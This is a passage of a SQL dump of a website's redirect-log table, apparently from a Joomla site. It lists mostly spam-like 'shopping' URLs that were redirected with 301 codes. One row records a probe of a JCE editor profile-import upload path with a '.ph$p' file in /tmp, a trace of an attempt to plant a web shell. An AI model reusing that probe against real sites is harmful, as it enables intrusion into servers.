00:00:00',301),(67909,'https://3s-technologies.com.tr/tr/shopping/keratoidea/1378836606.html',NULL,'https://3s-technologies.com.tr/shopping/keratoidea/1378836606.html','',1,0,'2026-06-10 23:41:12','0000-00-00 00:00:00',301),(67910,'https://3s-technologies.com.tr/tr/shopping/opinions/301529947.html',NULL,'https://3s-technologies.com.tr/shopping/opinions/301529947.html','',1,0,'2026-06-10 23:41:15','0000-00-00 00:00:00',301),(67911,'http://3s-technologies.com.tr/tr/shopping/model/1698766546.html',NULL,'','',1,0,'2026-06-10 23:41:16','0000-00-00 00:00:00',301),(67912,'http://3s-technologies.com.tr/tr/shopping/lamellary/2307234523.html',NULL,'','',2,0,'2026-06-10 23:41:18','0000-00-00 00:00:00',301),(67913,'https://3s-technologies.com.tr/tr/shopping/hydrosulphureted/3843651272.html',NULL,'https://3s-technologies.com.tr/shopping/hydrosulphureted/3843651272.html','',1,0,'2026-06-10 23:41:18','0000-00-00 00:00:00',301),(67914,'https://3s-technologies.com.tr/tr/shopping/malvastrum/938134719.html',NULL,'https://3s-technologies.com.tr/shopping/malvastrum/938134719.html','',1,0,'2026-06-10 23:41:21','0000-00-00 00:00:00',301),(67915,'http://3s-technologies.com.tr/tr/shopping/exuberantly/1488449637.html',NULL,'','',1,0,'2026-06-10 23:41:21','0000-00-00 00:00:00',301),(67916,'http://3s-technologies.com.tr/tr/shopping/lixiviation/508718504.html',NULL,'','',2,0,'2026-06-10 23:41:23','0000-00-00 00:00:00',301),(67917,'https://3s-technologies.com.tr/tr/shopping/albuminoidal/829401029.html',NULL,'https://3s-technologies.com.tr/shopping/albuminoidal/829401029.html','',1,0,'2026-06-10 23:41:24','0000-00-00 00:00:00',301),(67918,'https://3s-technologies.com.tr/tr/shopping/cerebella/1303876307.html',NULL,'https://3s-technologies.com.tr/shopping/cerebella/1303876307.html','',1,0,'2026-06-10 23:41:27','0000-00-00 00:00:00',301),(67919,'https://3s-technologies.com.tr/tr/shopping/odometrical/2900776557.html',NULL,'https://3s-technologies.com.tr/shopping/odometrical/2900776557.html','',1,0,'2026-06-10 23:41:30','0000-00-00 00:00:00',301),(67920,'https://3s-technologies.com.tr/tr/shopping/redspotted/3034324628.html',NULL,'https://3s-technologies.com.tr/shopping/redspotted/3034324628.html','',1,0,'2026-06-10 23:41:33','0000-00-00 00:00:00',301),(67921,'https://3s-technologies.com.tr/tr/shopping/titanate/2523972123.html',NULL,'https://3s-technologies.com.tr/shopping/titanate/2523972123.html','',1,0,'2026-06-10 23:41:36','0000-00-00 00:00:00',301),(67922,'https://3s-technologies.com.tr/tr/shopping/temporaneous/106512104.html',NULL,'https://3s-technologies.com.tr/shopping/temporaneous/106512104.html','',1,0,'2026-06-10 23:41:39','0000-00-00 00:00:00',301),(67923,'https://3s-technologies.com.tr/tr/shopping/framboesia/2914034604.html',NULL,'https://3s-technologies.com.tr/shopping/framboesia/2914034604.html','',1,0,'2026-06-10 23:41:42','0000-00-00 00:00:00',301),(67924,'https://3s-technologies.com.tr/tr/shopping/persuasively/2681021477.html',NULL,'https://3s-technologies.com.tr/shopping/persuasively/2681021477.html','',1,0,'2026-06-10 23:41:45','0000-00-00 00:00:00',301),(67925,'https://3s-technologies.com.tr/tr/shopping/motherly/1895317044.html',NULL,'https://3s-technologies.com.tr/shopping/motherly/1895317044.html','',1,0,'2026-06-10 23:41:48','0000-00-00 00:00:00',301),(67926,'https://3s-technologies.com.tr/tr/shopping/elengeness/3347345766.html',NULL,'https://3s-technologies.com.tr/shopping/elengeness/3347345766.html','',1,0,'2026-06-10 23:41:51','0000-00-00 00:00:00',301),(67927,'https://3s-technologies.com.tr/tr/shopping/pupate/2670351167.html',NULL,'https://3s-technologies.com.tr/shopping/pupate/2670351167.html','',1,0,'2026-06-10 23:41:54','0000-00-00 00:00:00',301),(67928,'https://3s-technologies.com.tr/tr/shopping/eyght/3921808185.html',NULL,'https://3s-technologies.com.tr/shopping/eyght/3921808185.html','',1,0,'2026-06-10 23:41:57','0000-00-00 00:00:00',301),(67929,'https://3s-technologies.com.tr/tr/shopping/rafflesia/366656024.html',NULL,'https://3s-technologies.com.tr/shopping/rafflesia/366656024.html','',1,0,'2026-06-10 23:42:02','0000-00-00 00:00:00',301),(67930,'https://3s-technologies.com.tr/tr/shopping/struttingly/3908696593.html',NULL,'https://3s-technologies.com.tr/shopping/struttingly/3908696593.html','',1,0,'2026-06-10 23:42:05','0000-00-00 00:00:00',301),(67931,'https://3s-technologies.com.tr/tr/shopping/watermen/2206962575.html',NULL,'https://3s-technologies.com.tr/shopping/watermen/2206962575.html','',1,0,'2026-06-10 23:42:08','0000-00-00 00:00:00',301),(67932,'https://3s-technologies.com.tr/tr/shopping/scilicet/2706808277.html',NULL,'https://3s-technologies.com.tr/shopping/scilicet/2706808277.html','',1,0,'2026-06-10 23:42:11','0000-00-00 00:00:00',301),(67933,'https://3s-technologies.com.tr/tr/shopping/touslesmois/3949716437.html',NULL,'https://3s-technologies.com.tr/shopping/touslesmois/3949716437.html','',1,0,'2026-06-10 23:42:14','0000-00-00 00:00:00',301),(67934,'https://3s-technologies.com.tr/tr/shopping/reluctant/2377757798.html',NULL,'https://3s-technologies.com.tr/shopping/reluctant/2377757798.html','',1,0,'2026-06-10 23:42:17','0000-00-00 00:00:00',301),(67935,'https://3s-technologies.com.tr/tr/shopping/radicans/1627108831.html',NULL,'https://3s-technologies.com.tr/shopping/radicans/1627108831.html','',1,0,'2026-06-10 23:42:20','0000-00-00 00:00:00',301),(67936,'https://3s-technologies.com.tr/tr/shopping/fishful/1562203178.html',NULL,'https://3s-technologies.com.tr/shopping/fishful/1562203178.html','',1,0,'2026-06-10 23:42:23','0000-00-00 00:00:00',301),(67937,'https://3s-technologies.com.tr/tr/shopping/glairy/3158431572.html',NULL,'https://3s-technologies.com.tr/shopping/glairy/3158431572.html','',1,0,'2026-06-10 23:42:26','0000-00-00 00:00:00',301),(67938,'https://3s-technologies.com.tr/tr/shopping/guaranies/108936318.html',NULL,'https://3s-technologies.com.tr/shopping/guaranies/108936318.html','',1,0,'2026-06-10 23:42:29','0000-00-00 00:00:00',301),(67939,'https://3s-technologies.com.tr/tr/shopping/boulangism/1521889299.html',NULL,'https://3s-technologies.com.tr/shopping/boulangism/1521889299.html','',1,0,'2026-06-10 23:42:32','0000-00-00 00:00:00',301),(67940,'https://3s-technologies.com.tr/tr/shopping/belonites/4227378934.html',NULL,'https://3s-technologies.com.tr/shopping/belonites/4227378934.html','',1,0,'2026-06-10 23:42:35','0000-00-00 00:00:00',301),(67941,'https://3s-technologies.com.tr/tr/shopping/vulgata/88041052.html',NULL,'https://3s-technologies.com.tr/shopping/vulgata/88041052.html','',1,0,'2026-06-10 23:42:38','0000-00-00 00:00:00',301),(67942,'https://3s-technologies.com.tr/tr/shopping/civies/841118735.html',NULL,'https://3s-technologies.com.tr/shopping/civies/841118735.html','',1,0,'2026-06-10 23:42:41','0000-00-00 00:00:00',301),(67943,'https://3s-technologies.com.tr/tr/shopping/attorneyship/2242834089.html',NULL,'https://3s-technologies.com.tr/shopping/attorneyship/2242834089.html','',1,0,'2026-06-10 23:42:44','0000-00-00 00:00:00',301),(67944,'https://3s-technologies.com.tr/tr/shopping/crecca/3301573611.html',NULL,'https://3s-technologies.com.tr/shopping/crecca/3301573611.html','',1,0,'2026-06-10 23:42:47','0000-00-00 00:00:00',301),(67945,'https://3s-technologies.com.tr/tr/shopping/acnodal/582251589.html',NULL,'https://3s-technologies.com.tr/shopping/acnodal/582251589.html','',1,0,'2026-06-10 23:42:50','0000-00-00 00:00:00',301),(67946,'https://3s-technologies.com.tr/tr/shopping/nineveh/1313006276.html',NULL,'https://3s-technologies.com.tr/shopping/nineveh/1313006276.html','',1,0,'2026-06-10 23:42:56','0000-00-00 00:00:00',301),(67947,'https://3s-technologies.com.tr/tr/shopping/examinant/2693977320.html',NULL,'https://3s-technologies.com.tr/shopping/examinant/2693977320.html','',1,0,'2026-06-10 23:42:58','0000-00-00 00:00:00',301),(67948,'https://3s-technologies.com.tr/tr/shopping/nonnitrogenous/2781652221.html',NULL,'https://3s-technologies.com.tr/shopping/nonnitrogenous/2781652221.html','',1,0,'2026-06-10 23:43:01','0000-00-00 00:00:00',301),(67949,'https://3s-technologies.com.tr/tr/shopping/calaite/3641857215.html',NULL,'https://3s-technologies.com.tr/shopping/calaite/3641857215.html','',1,0,'2026-06-10 23:43:04','0000-00-00 00:00:00',301),(67950,'https://3s-technologies.com.tr/tr/shopping/septemfluous/3043778912.html',NULL,'https://3s-technologies.com.tr/shopping/septemfluous/3043778912.html','',1,0,'2026-06-10 23:43:07','0000-00-00 00:00:00',301),(67951,'https://3s-technologies.com.tr/tr/shopping/mothered/4143684717.html',NULL,'https://3s-technologies.com.tr/shopping/mothered/4143684717.html','',1,0,'2026-06-10 23:43:10','0000-00-00 00:00:00',301),(67952,'https://3s-technologies.com.tr/tr/shopping/virgalieu/3535268848.html',NULL,'https://3s-technologies.com.tr/shopping/virgalieu/3535268848.html','',1,0,'2026-06-10 23:43:13','0000-00-00 00:00:00',301),(67953,'http://3s-technologies.com.tr/tr/shopping/disseminative/919625897.html',NULL,'','',2,0,'2026-06-10 23:43:15','0000-00-00 00:00:00',301),(67954,'https://3s-technologies.com.tr/tr/shopping/magazine/295565537.html',NULL,'https://3s-technologies.com.tr/shopping/magazine/295565537.html','',1,0,'2026-06-10 23:43:16','0000-00-00 00:00:00',301),(67955,'https://3s-technologies.com.tr/tr/shopping/matrimonially/3587628659.html',NULL,'https://3s-technologies.com.tr/shopping/matrimonially/3587628659.html','',1,0,'2026-06-10 23:43:19','0000-00-00 00:00:00',301),(67956,'https://3s-technologies.com.tr/tr/shopping/concupiscible/3649150836.html',NULL,'https://3s-technologies.com.tr/shopping/concupiscible/3649150836.html','',1,0,'2026-06-10 23:43:22','0000-00-00 00:00:00',301),(67957,'https://3s-technologies.com.tr/tr/shopping/supersulphate/3876428963.html',NULL,'https://3s-technologies.com.tr/shopping/supersulphate/3876428963.html','',1,0,'2026-06-10 23:43:25','0000-00-00 00:00:00',301),(67958,'https://3s-technologies.com.tr/tr/shopping/sliver/1943366990.html',NULL,'https://3s-technologies.com.tr/shopping/sliver/1943366990.html','',1,0,'2026-06-10 23:43:28','0000-00-00 00:00:00',301),(67959,'http://3s-technologies.com.tr/tr/shopping/idolatrical/2421983268.html',NULL,'','',1,0,'2026-06-10 23:43:30','0000-00-00 00:00:00',301),(67960,'https://3s-technologies.com.tr/tr/shopping/frosty/3704542010.html',NULL,'https://3s-technologies.com.tr/shopping/frosty/3704542010.html','',1,0,'2026-06-10 23:43:31','0000-00-00 00:00:00',301),(67961,'http://3s-technologies.com.tr/en/tmp/234234.ph$p',NULL,'http://3s-technologies.com.tr/index.php?option=com_jce&task=profiles.import','',1,0,'2026-06-10 23:43:32','0000-00-00 00:00:00',301),(67962,'https://3s-technologies.com.tr/tr/shopping/vowelism/3238988844.html',NULL,'https://3s-technologies.com.tr/shopping/vowelism/3238988844.html','',1,0,'2026-06-10 23:43:34','0000-00-00 00:00:00',301),(67963,'https://3s-technologies.com.tr/tr/shopping/parenchymatous/4234737278.html',NULL,'https://3s-technologies.com.tr/shopping/parenchymatous/4234737278.html','',1,0,'2026-06-10 23:43:37','0000-00-00 00:00:00',301),(67964,'https://3s-technologies.com.tr/tr/shopping/impersonate/989939045.html',NULL,'https://3s-technologies.com.tr/shopping/impersonate/989939045.html','',1,0,'2026-06-10 23:43:40','0000-00-00 00:00:00',301),(67965,'https://3s-technologies.com.tr/tr/shopping/loupcervier/3516651341.html',NULL,'https://3s-technologies.com.tr/shopping/loupcervier/3516651341.html','',1,0,'2026-06-10 23:43:43','0000-00-00 00:00:00',301),(67966,'https://3s-technologies.com.tr/tr/shopping/tazza/2613584355.html',NULL,'https://3s-technologies.com.tr/shopping/tazza/2613584355.html','',1,0,'2026-06-10 23:43:46','0000-00-00 00:00:00',301),(67967,'https://3s-technologies.com.tr/tr/shopping/duplicidentata/1471314156.html',NULL,'https://3s-technologies.com.tr/shopping/duplicidentata/1471314156.html','',1,0,'2026-06-10 23:43:49','0000-00-00 00:00:00',301),(67968,'https://3s-technologies.com.tr/tr/shopping/poachy/1510124018.html',NULL,'https://3s-technologies.com.tr/shopping/poachy/1510124018.html','',1,0,'2026-06-10 23:43:52','0000-00-00 00:00:00',301),(67969,'http://3s-technologies.com.tr/tr/shopping/advenient/1450640744.html',NULL,'','',1,0,'2026-06-10 23:43:53','0000-00-00 00:00:00',301),(67970,'https://3s-technologies.com.tr/tr/shopping/unaccustomed/1238603791.html',NULL,'https://3s-technologies.com.tr/shopping/unaccustomed/1238603791.html','',1,0,'2026-06-10 23:43:55','0000-00-00 00:00:00',301),(67971,'https://3s-technologies.com.tr/tr/shopping/vavasour/2058002566.html',NULL,'https://3s-technologies.com.tr/shopping/vavasour/2058002566.html','',1,0,'2026-06-10 23:44:02','0000-00-00 00:00:00',301),(67972,'https://3s-technologies.com.tr/tr/shopping/enthusiast/2300866408.html',NULL,'https://3s-technologies.com.tr/shopping/enthusiast/2300866408.html','',1,0,'2026-06-10 23:44:04','0000-00-00 00:00:00',301),(67973,'https://3s-technologies.com.tr/tr/shopping/whiskin/1630649027.html',NULL,'https://3s-technologies.com.tr/shopping/whiskin/1630649027.html','',1,0,'2026-06-10 23:44:08','0000-00-00 00:00:00',301),(67974,'https://3s-technologies.com.tr/tr/shopping/dasyurine/2052038172.html',NULL,'https://3s-technologies.com.tr/shopping/dasyurine/2052038172.html','',1,0,'2026-06-10 23:44:11','0000-00-00 00:00:00',301),(67975,'https://3s-technologies.com.tr/tr/shopping/defecate/2607766400.html',NULL,'https://3s-technologies.com.tr/shopping/defecate/2607766400.html','',1,0,'2026-06-10 23:44:14','0000-00-00 00:00:00',301),(67976,'https://3s-technologies.com.tr/tr/shopping/lifeboat/2082108815.html',NULL,'https://3s-technologies.com.tr/shopping/lifeboat/2082108815.html','',1,0,'2026-06-10 23:44:17','0000-00-00 00:00:00',301),(67977,'https://3s-technologies.com.tr/tr/shopping/gallopavo/2408224476.html',NULL,'https://3s-technologies.com.tr/shopping/gallopavo/2408224476.html','',1,0,'2026-06-10 23:44:20','0000-00-00 00:00:00',301),(67978,'https://3s-technologies.com.tr/tr/shopping/turribant/3514373582.html',NULL,'https://3s-technologies.com.tr/shopping/turribant/3514373582.html','',1,0,'2026-06-10 23:44:22','0000-00-00 00:00:00',301),(67979,'http://3s-technologies.com.tr/tr/shopping/source/2166656366.html',NULL,'','',1,0,'2026-06-10 23:44:24','0000-00-00 00:00:00',301),(67980,'https://3s-technologies.com.tr/tr/shopping/mussulmanic/2212091606.html',NULL,'https://3s-technologies.com.tr/shopping/mussulmanic/2212091606.html','',1,0,'2026-06-10 23:44:26','0000-00-00 00:00:00',301),(67981,'https://3s-technologies.com.tr/tr/shopping/magadhan/2194131618.html',NULL,'https://3s-technologies.com.tr/shopping/magadhan/2194131618.html','',1,0,'2026-06-10 23:44:28','0000-00-00 00:00:00',301),(67982,'http://3s-technologies.com.tr/tr/shopping/clicky/3840988234.html',NULL,'','',1,0,'2026-06-10 23:44:31','0000-00-00 00:00:00',301),(67983,'https://3s-technologies.com.tr/tr/shopping/arboreal/1714505796.html',NULL,'https://3s-technologies.com.tr/shopping/arboreal/1714505796.html','',1,0,'2026-06-10 23:44:32','0000-00-00 00:00:00',301),(67984,'https://3s-technologies.com.tr/tr/shopping/marattiaceae/743395767.html',NULL,'https://3s-technologies.com.tr/shopping/marattiaceae/743395767.html','',1,0,'2026-06-10 23:44:35','0000-00-00 00:00:00',301),(67985,'https://3s-technologies.com.tr/tr/shopping/bybidder/2663321081.html',NULL,'https://3s-technologies.com.tr/shopping/bybidder/2663321081.html','',1,0,'2026-06-10 23:44:37','0000-00-00 00:00:00',301),(67986,'https://3s-technologies.com.tr/tr/shopping/serfhood/1570708930.html',NULL,'https://3s-technologies.com.tr/shopping/serfhood/1570708930.html','',1,0,'2026-06-10 23:44:40','0000-00-00 00:00:00',301),(67987,'https://3s-technologies.com.tr/tr/shopping/feudatary/1950725302.html',NULL,'https://3s-technologies.com.tr/shopping/feudatary/1950725302.html','',1,0,'2026-06-10 23:44:44','0000-00-00 00:00:00',301),(67988,'https://3s-technologies.com.tr/tr/shopping/irrecordable/3348557865.html',NULL,'https://3s-technologies.com.tr/shopping/irrecordable/3348557865.html','',1,0,'2026-06-10 23:44:47','0000-00-00 00:00:00',301),(67989,'https://3s-technologies.com.tr/tr/shopping/furilic/1268004777.html',NULL,'https://3s-technologies.com.tr/shopping/furilic/1268004777.html','',1,0,'2026-06-10 23:44:50','0000-00-00 00:00:00',301),(67990,'http://3s-technologies.com.tr/tr/shopping/zymase/3844364939.html',NULL,'','',1,0,'2026-06-10 23:44:50','0000-00-00 00:00:00',301),(67991,'https://3s-technologies.com.tr/tr/shopping/chinine/3011543679.html',NULL,'https://3s-technologies.com.tr/shopping/chinine/3011543679.html','',1,0,'2026-06-10 23:44:53','0000-00-00 00:00:00',301),(67992,'https://3s-technologies.com.tr/tr/shopping/agglutination/1733254784.html',NULL,'https://3s-technologies.com.tr/shopping/agglutination/1733254784.html','',1,0,'2026-06-10 23:44:56','0000-00-00 00:00:00',301),(67993,'https://3s-technologies.com.tr/tr/shopping/infallibilist/2702219505.html',NULL,'https://3s-technologies.com.tr/shopping/infallibilist/2702219505.html','',1,0,'2026-06-10 23:44:59','0000-00-00 00:00:00',301),(67994,'https://3s-technologies.com.tr/tr/shopping/epibolic/2310320676.html',NULL,'https://3s-technologies.com.tr/shopping/epibolic/2310320676.html','',1,0,'2026-06-10 23:45:02','0000-00-00 00:00:00',301),(67995,'https://3s-technologies.com.tr/tr/shopping/flavifrontella/2650668000.html',NULL,'https://3s-technologies.com.tr/shopping/flavifrontella/2650668000.html','',1,0,'2026-06-10 23:45:08','0000-00-00 00:00:00',301),(67996,'https://3s-technologies.com.tr/tr/shopping/deontology/1024598492.html',NULL,'https://3s-technologies.com.tr/shopping/deontology/1024598492.html','',1,0,'2026-06-10 23:45:11','0000-00-00 00:00:00',301),(67997,'https://3s-technologies.com.tr/tr/shopping/sklere/1255958845.html',NULL,'https://3s-technologies.com.tr/shopping/sklere/1255958845.html','',1,0,'2026-06-10 23:45:14','0000-00-00 00:00:00',301),(67998,'https://3s-technologies.com.tr/tr/shopping/tunicin/3806714098.html',NULL,'https://3s-technologies.com.tr/shopping/tunicin/3806714098.html','',1,0,'2026-06-10 23:45:17','0000-00-00 00:00:00',301),(67999,'https://3s-technologies.com.tr/tr/shopping/blowby/4145849307.html',NULL,'https://3s-technologies.com.tr/shopping/blowby/4145849307.html','',1,0,'2026-06-10 23:45:26','0000-00-00 00:00:00',301),(68000,'https://3s-technologies.com.tr/tr/shopping/delthyris/2448621090.html',NULL,'https://3s-technologies.com.tr/shopping/delthyris/2448621090.html','',1,0,'2026-06-10 23:45:28','0000-00-00 00:00:00',301),(68001,'https://3s-technologies.com.tr/tr/shopping/desensitise/2754233974.html',NULL,'https://3s-technologies.com.tr/shopping/desensitise/2754233974.html','',1,0,'2026-06-10 23:45:31','0000-00-00 00:00:00',301),(68002,'https://3s-technologies.com.tr/tr/shopping/betrothing/2581905594.html',NULL,'https://3s-technologies.com.tr/shopping/betrothing/2581905594.html','',1,0,'2026-06-10 23:45:34','0000-00-00 00:00:00',301),(68003,'https://3s-technologies.com.tr/tr/shopping/nougat/1666916592.html',NULL,'https://3s-technologies.com.tr/shopping/nougat/1666916592.html','',1,0,'2026-06-10 23:45:37','0000-00-00 00:00:00',301),(68004,'https://3s-technologies.com.tr/tr/shopping/inofficially/1462808404.html',NULL,'https://3s-technologies.com.tr/shopping/inofficially/1462808404.html','',1,0,'2026-06-10 23:45:40','0000-00-00 00:00:00',301),(68005,'https://3s-technologies.com.tr/tr/shopping/inlaced/1591604180.html',NULL,'https://3s-technologies.com.tr/shopping/inlaced/1591604180.html','',1,0,'2026-06-10 23:45:43','0000-00-00 00:00:00',301),(68006,'https://3s-technologies.com.tr/tr/shopping/delimitation/3951994196.html',NULL,'https://3s-technologies.com.tr/shopping/delimitation/3951994196.html','',1,0,'2026-06-10 23:45:46','0000-00-00 00:00:00',301),(68007,'https://3s-technologies.com.tr/tr/shopping/quincunx/1139045478.html',NULL,'https://3s-technologies.com.tr/shopping/quincunx/1139045478.html','',1,0,'2026-06-10 23:45:49','0000-00-00 00:00:00',301),(68008,'https://3s-technologies.com.tr/tr/shopping/leadsman/3393332137.html',NULL,'https://3s-technologies.com.tr/shopping/leadsman/3393332137.html','',1,0,'2026-06-10 23:45:52','0000-00-00 00:00:00',301),(68009,'https://3s-technologies.com.tr/tr/shopping/lovingkindness/1740431293.html',NULL,'https://3s-technologies.com.tr/shopping/lovingkindness/1740431293.html','',1,0,'2026-06-10 23:45:55','0000-00-00 00:00:00',301),(68010,'https://3s-technologies.com.tr/tr/shopping/plausibleness/180752069.html',NULL,'https://3s-technologies.com.tr/shopping/plausibleness/180752069.html','',1,0,'2026-06-10 23:45:58','0000-00-00 00:00:00',301),(68011,'https://3s-technologies.com.tr/tr/shopping/forweep/1299124012.html',NULL,'https://3s-technologies.com.tr/shopping/forweep/1299124012.html','',1,0,'2026-06-10 23:46:01','0000-00-00 00:00:00',301),(68012,'https://3s-technologies.com.tr/tr/shopping/tortulous/3614601520.html',NULL,'https://3s-technologies.com.tr/shopping/tortulous/3614601520.html','',1,0,'2026-06-10 23:46:04','0000-00-00 00:00:00',301),(68013,'https://3s-technologies.com.tr/tr/shopping/epictetian/1195929402.html',NULL,'https://3s-technologies.com.tr/shopping/epictetian/1195929402.html','',1,0,'2026-06-10 23:46:07','0000-00-00 00:00:00',301),(68014,'https://3s-technologies.com.tr/tr/shopping/gazella/2130305184.html',NULL,'https://3s-technologies.com.tr/shopping/gazella/2130305184.html','',1,0,'2026-06-10 23:46:12','0000-00-00 00:00:00',301),(68015,'https://3s-technologies.com.tr/tr/shopping/tawdrier/3204186659.html',NULL,'https://3s-technologies.com.tr/shopping/tawdrier/3204186659.html','',1,0,'2026-06-10 23:46:15','0000-00-00 00:00:00',301),(68016,'https://3s-technologies.com.tr/tr/shopping/ophiomorpha/1713130190.html',NULL,'https://3s-technologies.com.tr/shopping/ophiomorpha/1713130190.html','',1,0,'2026-06-10 23:46:18','0000-00-00 00:00:00',301),(68017,'https://3s-technologies.com.tr/tr/shopping/diocess/786626612.html',NULL,'https://3s-technologies.com.tr/shopping/diocess/786626612.html','',1,0,'2026-06-10 23:46:21','0000-00-00 00:00:00',301),(68018,'https://3s-technologies.com.tr/tr/shopping/organometallic/2739699153.html',NULL,'https://3s-technologies.com.tr/shopping/organometallic/2739699153.html','',1,0,'2026-06-10 23:46:24','0000-00-00 00:00:00',301),(68019,'https://3s-technologies.com.tr/tr/shopping/tesota/2174448435.html',NULL,'https://3s-technologies.com.tr/shopping/tesota/2174448435.html','',1,0,'2026-06-10 23:46:27','0000-00-00 00:00:00',301),(68020,'https://3s-technologies.com.tr/tr/shopping/zemstvo/2351668794.html',NULL,'https://3s-technologies.com.tr/shopping/zemstvo/2351668794.html','',1,0,'2026-06-10 23:46:30','0000-00-00 00:00:00',301),(68021,'https://3s-technologies.com.tr/tr/shopping/gumshoe/3679336863.html',NULL,'https://3s-technologies.com.tr/shopping/gumshoe/3679336863.html','',1,0,'2026-06-10 23:46:33','0000-00-00 00:00:00',301),(68022,'https://3s-technologies.com.tr/tr/shopping/ministration/1003033585.html',NULL,'https://3s-technologies.com.tr/shopping/ministration/1003033585.html','',1,0,'2026-06-10 23:46:36','0000-00-00 00:00:00',301),(68023,'https://3s-technologies.com.tr/tr/shopping/theopneustic/4001748006.html',NULL,'https://3s-technologies.com.tr/shopping/theopneustic/4001748006.html','',1,0,'2026-06-10 23:46:39','0000-00-00 00:00:00',301),(68024,'https://3s-technologies.com.tr/tr/shopping/heptaglot/1086243237.html',NULL,'https://3s-technologies.com.tr/shopping/heptaglot/1086243237.html','',1,0,'2026-06-10 23:46:42','0000-00-00 00:00:00',301),(68025,'https://3s-technologies.com.tr/tr/shopping/prestigiatory/1902347114.html',NULL,'https://3s-technologies.com.tr/shopping/prestigiatory/1902347114.html','',1,0,'2026-06-10 23:46:45','0000-00-00 00:00:00',301),(68026,'https://3s-technologies.com.tr/tr/shopping/eschatology/3275302772.html',NULL,'https://3s-technologies.com.tr/shopping/eschatology/3275302772.html','',1,0,'2026-06-10 23:46:48','0000-00-00 00:00:00',301),(68027,'https://3s-technologies.com.tr/tr/shopping/vauntcourier/4149502688.html',NULL,'https://3s-technologies.com.tr/shopping/vauntcourier/4149502688.html','',1,0,'2026-06-10 23:46:51','0000-00-00 00:00:00',301),(68028,'https://3s-technologies.com.tr/tr/shopping/antiscoletic/2724163331.html',NULL,'https://3s-technologies.com.tr/shopping/antiscoletic/2724163331.html','',1,0,'2026-06-10 23:46:54','0000-00-00 00:00:00',301),(68029,'https://3s-technologies.com.tr/tr/shopping/aetheling/1556402291.html',NULL,'https://3s-technologies.com.tr/shopping/aetheling/1556402291.html','',1,0,'2026-06-10 23:46:57','0000-00-00 00:00:00',301),(68030,'http://3s-technologies.com.tr/tr/shopping/pronominal/1448053039.html',NULL,'','',1,0,'2026-06-10 23:47:01','0000-00-00 00:00:00',301),(68031,'https://3s-technologies.com.tr/tr/shopping/miliaceum/3391167563.html',NULL,'https://3s-technologies.com.tr/shopping/miliaceum/3391167563.html','',1,0,'2026-06-10 23:47:04','0000-00-00 00:00:00',301),(68032,'http://3s-technologies.com.tr/tr/shopping/cespitous/3273428718.html',NULL,'','',2,0,'2026-06-10 23:47:04','0000-00-00 00:00:00',301),(68033,'http://3s-technologies.com.tr/tr/shopping/hunkers/236970079.html',NULL,'','',2,0,'2026-06-10 23:47:09','0000-00-00 00:00:00',301),(68034,'https://3s-technologies.com.tr/tr/shopping/slavonic/4043193212.html',NULL,'https://3s-technologies.com.tr/shopping/slavonic/4043193212.html','',1,0,'2026-06-10 23:47:09','0000-00-00 00:00:00',301),(68035,'http://3s-technologies.com.tr/tr/shopping/elucubrate/2250513135.html',NULL,'','',1,0,'2026-06-10 23:47:12','0000-00-00 00:00:00',301),(68036,'https://3s-technologies.com.tr/tr/shopping/dishearten/2271023008.html',NULL,'https://3s-technologies.com.tr/shopping/dishearten/2271023008.html','',1,0,'2026-06-10 23:47:14','0000-00-00 00:00:00',301),(68037,'http://3s-technologies.com.tr/tr/shopping/levana/73072442.html',NULL,'','',2,0,'2026-06-10 23:47:14','0000-00-00 00:00:00',301),(68038,'https://3s-technologies.com.tr/tr/shopping/stannoso/3198385788.html',NULL,'https://3s-technologies.com.tr/shopping/stannoso/3198385788.html','',1,0,'2026-06-10 23:47:17','0000-00-00 00:00:00',301),(68039,'http://3s-technologies.com.tr/tr/shopping/metaphoric/3037316038.html',NULL,'','',1,0,'2026-06-10 23:47:18','0000-00-00 00:00:00',301),(68040,'https://3s-technologies.com.tr/tr/shopping/sallet/1916212310.html',NULL,'https://3s-technologies.com.tr/shopping/sallet/1916212310.html','',1,0,'2026-06-10 23:47:20','0000-00-00 00:00:00',301),(68041,'https://3s-technologies.com.tr/tr/shopping/clarino/3858121418.html',NULL,'https://3s-technologies.com.tr/shopping/clarino/3858121418.html','',1,0,'2026-06-10 23:47:23','0000-00-00 00:00:00',301),(68042,'https://3s-technologies.com.tr/tr/shopping/sanguineus/3291166836.html',NULL,'https://3s-technologies.com.tr/shopping/sanguineus/3291166836.html','',1,0,'2026-06-10 23:47:26','0000-00-00 00:00:00',301),(68043,'https://3s-technologies.com.tr/tr/shopping/dogskin/1001704342.html',NULL,'https://3s-technologies.com.tr/shopping/dogskin/1001704342.html','',1,0,'2026-06-10 23:47:29','0000-00-00 00:00:00',301),(68044,'https://3s-technologies.com.tr/tr/shopping/talmudic/3752738395.html',NULL,'https://3s-technologies.com.tr/shopping/talmudic/3752738395.html','',1,0,'2026-06-10 23:47:32','0000-00-00 00:00:00',301),(68045,'https://3s-technologies.com.tr/tr/shopping/contravener/2764904316.html',NULL,'https://3s-technologies.com.tr/shopping/contravener/2764904316.html','',1,0,'2026-06-10 23:47:35','0000-00-00 00:00:00',301),(68046,'https://3s-technologies.com.tr/tr/shopping/wagenboom/4073659874.html',NULL,'https://3s-technologies.com.tr/shopping/wagenboom/4073659874.html','',1,0,'2026-06-10 23:47:38','0000-00-00 00:00:00',301),(68047,'https://3s-technologies.com.tr/tr/shopping/disheartened/1906935918.html',NULL,'https://3s-technologies.com.tr/shopping/disheartened/1906935918.html','',1,0,'2026-06-10 23:47:41','0000-00-00 00:00:00',301),(68048,'https://3s-technologies.com.tr/tr/shopping/gentlemens/1932960215.html',NULL,'https://3s-technologies.com.tr/shopping/gentlemens/1932960215.html','',1,0,'2026-06-10 23:47:44','0000-00-00 00:00:00',301),(68049,'https://3s-technologies.com.tr/tr/shopping/aspersoir/1071419223.html',NULL,'https://3s-technologies.com.tr/shopping/aspersoir/1071419223.html','',1,0,'2026-06-10 23:47:47','0000-00-00 00:00:00',301),(68050,'https://3s-technologies.com.tr/tr/shopping/medallurgy/1288194078.html',NULL,'https://3s-technologies.com.tr/shopping/medallurgy/1288194078.html','',1,0,'2026-06-10 23:47:50','0000-00-00 00:00:00',301),(68051,'https://3s-technologies.com.tr/tr/shopping/tettigonia/1538637204.html',NULL,'https://3s-technologies.com.tr/shopping/tettigonia/1538637204.html','',1,0,'2026-06-10 23:47:56','0000-00-00 00:00:00',301),(68052,'https://3s-technologies.com.tr/tr/shopping/tagliacotian/1775929141.html',NULL,'https://3s-technologies.com.tr/shopping/tagliacotian/1775929141.html','',1,0,'2026-06-10 23:47:59','0000-00-00 